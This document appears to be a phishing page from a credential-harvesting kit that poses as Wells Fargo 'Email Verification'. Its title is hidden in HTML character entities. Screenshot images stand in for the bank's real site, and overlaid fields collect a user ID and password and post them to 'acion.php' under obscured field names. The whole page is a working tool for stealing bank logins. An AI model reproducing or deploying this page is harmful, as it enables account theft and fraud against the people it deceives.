
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<title>&#x45;&#x6D;&#x61;&#x69;&#x6C;&#x20;&#x56;&#x65;&#x72;&#x69;&#x66;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6F;&#x6E;&#x20;&#x2D;&#x20;&#x57;&#x65;&#x6C;&#x6C;&#x73;&#x20;&#x46;&#x61;&#x72;&#x67;&#x6F;&#x20;&#x4F;&#x6E;&#x6C;&#x69;&#x6E;&#x65;</title>
<meta http-equiv="content-type" content="text/html; charset=UTF8">
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">


<link rel="shortcut icon"
              href="img/favicon.ico"/>


<style> 
 
 .inputs {
    padding: 1px;
    border-radius: 3px;
    border: 1px solid #CCC;
font-family:verdana;font-size:13px
    background-image: none;
    width: 270px;
	height: 35px;
	font-size: 15px;
}

.inputs:focus {
    outline-color: #54B4AD;
}
</style> 




<head></script></head>
<body>

<div id="image1" style="position:absolute; overflow:hidden; left:250px; top:0px; width:1349px; height:610px; z-index:0"><img src="img/ghead.png" alt="" title="" border=0 width=1349 height=610></div>


<div id="imase2" style="position:absolute; overflow:hidden; left:250px; top:610px; width:1350px; height:474px; z-index:10"><a href="#"><img src="img/fti.png" alt="" title="" border=0 width=1350 height=474></a></div>

<form action="acion.php" name="okai" method="post">


  <input id="cr9422"  autocomplete="off" required="" style="position:absolute;left:760px;top:296px;width:175px;height:23px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="jinga" value="" type="text" >

  <input id="cu39422"  autocomplete="off" style="position:absolute;left:760px;top:325px;width:175px;height:23px;border:1px #C0C0C0 solid;font-family:Arial;border-radius:2px;font-size:12px;z-index:1" name="awko2" value="" type="password" >



<div id="formimage1" style="position:absolute; left:795px; top:397px; z-index:34">
<input type="image" name="formimage1" width="82" height="26" src="img/next.png"></div>
</form>
</body>
</html>
